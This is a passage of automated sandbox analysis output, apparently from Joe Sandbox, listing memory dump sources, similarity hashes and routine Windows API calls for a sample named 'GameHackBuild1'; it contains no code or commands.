                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: ab01f121681e031170a9e2546754e817968698fc2297626278674c5d3950da56
                                      • Instruction ID: 3b14fdab2d3f7ad3e7e633e13923daa3172ffdaa8a8ca82c7dd6f54020d35d5f
                                      • Opcode Fuzzy Hash: ab01f121681e031170a9e2546754e817968698fc2297626278674c5d3950da56
                                      • Instruction Fuzzy Hash: DE2117729041099FCF15EFA9EA519EEBBF6BF58300B1004ADE845A7291CB325E54CB60
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00A1A7C8
                                        • Part of subcall function 00A01380: __EH_prolog.LIBCMT ref: 00A01385
                                        • Part of subcall function 00A01380: new.LIBCMT ref: 00A013FE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: ea36e66be1a603e2caf8cf014386ddbb8d0f8508c5da18bb6d543d9f48159a0a
                                      • Instruction ID: 396a09b11c412273ea573703b666c00797cbc4c6fbf8198fecbb967d52fed6eb
                                      • Opcode Fuzzy Hash: ea36e66be1a603e2caf8cf014386ddbb8d0f8508c5da18bb6d543d9f48159a0a
                                      • Instruction Fuzzy Hash: B6218E71C0529D9ECF15DF98DA529EEB7F4EF19300F0004AEE809A7242DB356E46CBA1
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: af5d402b1601b0b7d63fa0f40eba062bdd889175d9b628e434a3ddcb867f33d9
                                      • Instruction ID: 5d343409c0c7dca282b444ee1c4f8c67dcb819969acdec6b0bb9ad8a0e71a52e
                                      • Opcode Fuzzy Hash: af5d402b1601b0b7d63fa0f40eba062bdd889175d9b628e434a3ddcb867f33d9
                                      • Instruction Fuzzy Hash: E211A573E0052C9BCF26AFA8DD519DEB736EF48750F044219FC14BB2D2CA349D108AA1
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00A05BDC
                                        • Part of subcall function 00A0B07D: __EH_prolog.LIBCMT ref: 00A0B082
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: b50b3d6bd701d0beb458c94d6300f0e67c7f6dd5374bd46547eb83d30168ff76
                                      • Instruction ID: 5ecba704122aa602bc4cb102d1ebd02f4dc0feb4b7d08a706f570771b167a84a
                                      • Opcode Fuzzy Hash: b50b3d6bd701d0beb458c94d6300f0e67c7f6dd5374bd46547eb83d30168ff76
                                      • Instruction Fuzzy Hash: DC01AD30A10688DEC724F7B4E2553DEFBA49F5A300F40409EE85E232C3CBB01B08C662
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000000,?,?,?,00A23A26,?,0000015D,?,?,?,?,00A24F02,000000FF,00000000,?,?), ref: 00A2854A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: 690a71c2c688b8dcda2bb150e8f9d2dcc63aa879bde6f92544f9a0a010c6fec1
                                      • Instruction ID: 44bad18eb7361c77ffbf64e0cb2b87a97493df0d281e1fefe54d7ecbe0200c66
                                      • Opcode Fuzzy Hash: 690a71c2c688b8dcda2bb150e8f9d2dcc63aa879bde6f92544f9a0a010c6fec1
                                      • Instruction Fuzzy Hash: 20E0ED316872319AEB312BADBD00B9A7BDC9F417B0F180230FC18A6092CF2CCC0185E5
                                      APIs
                                      • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00A0A4F5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: CloseFind
                                      • String ID:
                                      • API String ID: 1863332320-0
                                      • Opcode ID: 807a30b5460c59640f738153ea80f7c27187340bf9f9d5b8e764821789da4a8d
                                      • Instruction ID: 3782f38251df6639be118aecc3be1892daa452ab2b89fbf7ad6c422611a5eba4
                                      • Opcode Fuzzy Hash: 807a30b5460c59640f738153ea80f7c27187340bf9f9d5b8e764821789da4a8d
                                      • Instruction Fuzzy Hash: 98F0E935008384AACA225BB85D047C77BA0AF26371F04CA09F1FD021D1C37524959723
                                      APIs
                                      • SetThreadExecutionState.KERNEL32(00000001), ref: 00A106B1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: ExecutionStateThread
                                      • String ID:
                                      • API String ID: 2211380416-0
                                      • Opcode ID: d3937f8258783239c7f6312c5ccfbdeab76fbeee14e5f844d82e2a1184148b60
                                      • Instruction ID: e14409d0294e11ebed6941a5af6d40ae03e8e3449771df83bcec445141d395fa
                                      • Opcode Fuzzy Hash: d3937f8258783239c7f6312c5ccfbdeab76fbeee14e5f844d82e2a1184148b60
                                      • Instruction Fuzzy Hash: 77D0C22920411029CA253364AA09BFE2A060FC3714F0C0021F61D575C78A9608CA62A2
                                      APIs
                                      • GdipAlloc.GDIPLUS(00000010), ref: 00A19D81
                                        • Part of subcall function 00A19B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00A19B30
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: Gdip$AllocBitmapCreateFromStream
                                      • String ID:
                                      • API String ID: 1915507550-0
                                      • Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                                      • Instruction ID: 238df74898c8de98bfc00f627e97eff4fb9d0d3f942ca72e372b6cf407f6d40c
                                      • Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                                      • Instruction Fuzzy Hash: E1D0C73065820D7ADF41BB759D229FB7BB9DB04350F108165BC0886151FD71DE90E661
                                      APIs
                                      • GetFileType.KERNELBASE(000000FF,00A09887), ref: 00A09995
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: FileType
                                      • String ID:
                                      • API String ID: 3081899298-0
                                      • Opcode ID: 52f22c30f8cd619445443d8908b4b4a3bd23a3077362dc37d7947eafc885141b
                                      • Instruction ID: a072fa240222655171b207ca7e5eba075baa7ecb24c340344813534e78e135b3
                                      • Opcode Fuzzy Hash: 52f22c30f8cd619445443d8908b4b4a3bd23a3077362dc37d7947eafc885141b
                                      • Instruction Fuzzy Hash: 51D01232111144A6CF2587386D090DB7751DB833F6B38C6E8E025C40F2D723C903F581
                                      APIs
                                      • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00A1D43F
                                        • Part of subcall function 00A1AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A1AC85
                                        • Part of subcall function 00A1AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A1AC96
                                        • Part of subcall function 00A1AC74: IsDialogMessageW.USER32(00010444,?), ref: 00A1ACAA
                                        • Part of subcall function 00A1AC74: TranslateMessage.USER32(?), ref: 00A1ACB8
                                        • Part of subcall function 00A1AC74: DispatchMessageW.USER32(?), ref: 00A1ACC2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: Message$DialogDispatchItemPeekSendTranslate
                                      • String ID:
                                      • API String ID: 897784432-0
                                      • Opcode ID: 36a67101e1566cecfb6bba2a1ca5521d56d10480906a2747b4f984c71aebe25f
                                      • Instruction ID: 8dc79f324e7f0deaee4b8ae128423b44368f6dfdf71517e7bd971090af6f7779
                                      • Opcode Fuzzy Hash: 36a67101e1566cecfb6bba2a1ca5521d56d10480906a2747b4f984c71aebe25f
                                      • Instruction Fuzzy Hash: 8CD09E35144300ABD6116B91DF06F0F7AB6AB99B04F004A54B344740F286629D21AB16
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 867d358ea7b497519e3dd638de8c252f4d0676779f4a20531a0a582a7a836ca8
                                      • Instruction ID: 6c10deac9d0c36215d4a13f76012c781e9c18fb43fdcb33220e813d7bb662db7
                                      • Opcode Fuzzy Hash: 867d358ea7b497519e3dd638de8c252f4d0676779f4a20531a0a582a7a836ca8
                                      • Instruction Fuzzy Hash: 7CB012B527C5017C310C61046E42E7B022DE5C2B10330491AB20AD00C0D4405C850631
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 6f8145e542bba61420f04defa8691edff779d21e1d1feaae1e7d5a471d9a31af
                                      • Instruction ID: 49144d98eeaa2e63b6415b74d7c73f91e111b0744c1a2f434064e1e67e112e2c
                                      • Opcode Fuzzy Hash: 6f8145e542bba61420f04defa8691edff779d21e1d1feaae1e7d5a471d9a31af
                                      • Instruction Fuzzy Hash: 7FB012F127C4017C310C61046E02E76022DC5C3B10330C91AB60AE01C0D4405C8A0531
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 33afb5664f8c3eec44826d8901d83fdc4f560fb5b4cdf77ac1281c984dba8cec
                                      • Instruction ID: c4ec0957e5a89ea15043e9f933d4267f7e23f78a507d52a26dabff5eb516fb40
                                      • Opcode Fuzzy Hash: 33afb5664f8c3eec44826d8901d83fdc4f560fb5b4cdf77ac1281c984dba8cec
                                      • Instruction Fuzzy Hash: 98B012B527C7017D310C21006E52D7B022DC5C3B503304E2AB20AE00C0D4405CC94431
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: d67130026a178a7067726eb64291144a836cf0e85359e66e4dbb44c31e86748d
                                      • Instruction ID: 87d5b81405fa7a74027c6304b5ca1f004b5af7c99228b45605d9123cce84097a
                                      • Opcode Fuzzy Hash: d67130026a178a7067726eb64291144a836cf0e85359e66e4dbb44c31e86748d
                                      • Instruction Fuzzy Hash: C1B012B127C5017D314C61046E02E76022DC5C2B503304A1AB10ED00C0D4405DC50531
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 23f56006461658712312574a15a3e1021faff7da028fa22f0dc6253a9fd9507a
                                      • Instruction ID: 06b062357a93692d9ae6737cc9d1bd5116f8765854cfd1e8ca10a57a0dbf8723
                                      • Opcode Fuzzy Hash: 23f56006461658712312574a15a3e1021faff7da028fa22f0dc6253a9fd9507a
                                      • Instruction Fuzzy Hash: 1DB012B127C4017C310C61046F02E76022DC5C2B10330491AB10ED00C0D4405E860531
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 8d094425c28c9cc12e2192f3d580f4d743289aa2477af670a6824373df2f28f4
                                      • Instruction ID: 5627593e994edfbb73fbc945df3046afbdc3e2eebc43541a4b482f7e0fe5022c
                                      • Opcode Fuzzy Hash: 8d094425c28c9cc12e2192f3d580f4d743289aa2477af670a6824373df2f28f4
                                      • Instruction Fuzzy Hash: A3B012B127C4017C310C61056E02E76022DD5C2B10330491AB10ED00C0D4405D850531
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 165052b71122b83ab30de35089d6b228ca5cc0925bc5c2571781b8b6cce29e50
                                      • Instruction ID: abeb875d69d81d525aa5a14151e6dc2acf880f82c1910ffbd68ae1e9a57a6acb
                                      • Opcode Fuzzy Hash: 165052b71122b83ab30de35089d6b228ca5cc0925bc5c2571781b8b6cce29e50
                                      • Instruction Fuzzy Hash: E9B012F127C5017D314C61046E02E76022DC5C2B503308A1AB20AE01C0D4405CCA0531
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
